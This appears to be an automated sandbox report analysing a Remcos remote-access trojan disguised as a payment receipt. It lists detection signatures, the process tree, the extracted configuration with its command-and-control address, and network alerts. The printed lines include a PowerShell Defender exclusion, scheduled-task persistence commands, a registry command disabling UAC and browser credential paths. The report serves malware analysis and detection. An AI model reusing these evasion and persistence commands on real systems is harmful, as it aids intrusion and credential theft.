Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SwiftCopy_PaymtRecpt121228.exe

Overview

General Information

Sample name:SwiftCopy_PaymtRecpt121228.exe
Analysis ID:1576839
MD5:1f0ae2753f131f73c2fe881c1c8e7c8f
SHA1:e3d9f0de991f7b91c04449a0a12cb398df6cbd21
SHA256:695e10634e8981a0d110a120bade28b66b58c6400879b37257894d219c55048d
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SwiftCopy_PaymtRecpt121228.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7732 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7540 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SwiftCopy_PaymtRecpt121228.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 5600 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 5672 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 3304 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 1812 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
  • eaJOpx.exe (PID: 7832 cmdline: C:\Users\user\AppData\Roaming\eaJOpx.exe MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
    • schtasks.exe (PID: 7960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eaJOpx.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\eaJOpx.exe" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.210.150.17:56887:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OPLFYE", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x15380:$a1: Remcos restarted by watchdog!
          • 0x158f8:$a3: %02i:%02i:%02i:%03i
          Click to see the 30 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x69ef8:$a1: Remcos restarted by watchdog!
                • 0x6a470:$a3: %02i:%02i:%02i:%03i
                0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64204:$str_b2: Executing file:
                • 0x6503c:$str_b3: GetDirectListeningPort
                • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x64b80:$str_b7: \update.vbs
                • 0x6422c:$str_b9: Downloaded file:
                • 0x64218:$str_b10: Downloading file:
                • 0x642bc:$str_b12: Failed to upload file:
                • 0x65004:$str_b13: StartForward
                • 0x65024:$str_b14: StopForward
                • 0x64ad8:$str_b15: fso.DeleteFile "
                • 0x64a6c:$str_b16: On Error Resume Next
                • 0x64b08:$str_b17: fso.DeleteFolder "
                • 0x642ac:$str_b18: Uploaded file:
                • 0x6426c:$str_b19: Unable to delete:
                • 0x64aa0:$str_b20: while fso.FileExists("
                • 0x64749:$str_c0: [Firefox StoredLogins not found]
                Click to see the 51 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", ProcessId: 7520, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", ProcessId: 7520, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\eaJOpx.exe, ParentImage: C:\Users\user\AppData\Roaming\eaJOpx.exe, ParentProcessId: 7832, ParentProcessName: eaJOpx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp", ProcessId: 7960, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", ProcessId: 7540, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", ProcessId: 7520, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", ProcessId: 7540, ProcessName: schtasks.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: A7 7F D2 A1 D6 82 9B D3 44 CF D8 38 92 28 07 DB AC 3B 4F 29 4C EC 17 E7 29 A6 A2 04 44 84 DC 94 1C 66 0B EE C3 DE 8E 8D AE 7B F2 67 67 E0 99 AF 7E 86 05 6F 69 71 F2 C9 87 DC FA DA 7A DB 45 17 A3 BC 41 CE A8 9D 29 FA 52 C9 32 F6 59 A2 24 EB 2A 2E BA D2 F5 79 8A A6 DA 3E 08 38 25 0B 31 78 3F 6D 7D 80 A5 F8 99 24 99 58 59 A3 CD 55 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ProcessId: 7664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-OPLFYE\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T16:37:04.673904+010020365941Malware Command and Control Activity Detected192.168.2.549706192.210.150.1756887TCP
                2024-12-17T16:39:56.158723+010020365941Malware Command and Control Activity Detected192.168.2.549983192.210.150.1756887TCP
                2024-12-17T16:39:56.361838+010020365941Malware Command and Control Activity Detected192.168.2.549984192.210.150.1756887TCP
                2024-12-17T16:40:02.502445+010020365941Malware Command and Control Activity Detected192.168.2.549985192.210.150.1756887TCP
                2024-12-17T16:40:11.721264+010020365941Malware Command and Control Activity Detected192.168.2.549986192.210.150.1756887TCP
                2024-12-17T16:40:11.940037+010020365941Malware Command and Control Activity Detected192.168.2.549987192.210.150.1756887TCP
                2024-12-17T16:40:18.830725+010020365941Malware Command and Control Activity Detected192.168.2.549988192.210.150.1756887TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-17T16:37:07.330710+010028033043Unknown Traffic192.168.2.549708178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.17:56887:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OPLFYE", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeReversingLabs: Detection: 34%
                Multi AV Scanner detection for submitted file
                Source: SwiftCopy_PaymtRecpt121228.exeReversingLabs: Detection: 34%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: SwiftCopy_PaymtRecpt121228.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043294A
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_fd48e109-7

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: pUIh.pdbSHA256y` source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr
                Source: Binary string: pUIh.pdb source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10006580 FindFirstFileExA,7_2_10006580
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0044D5F9 FindFirstFileExA,12_2_0044D5F9
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
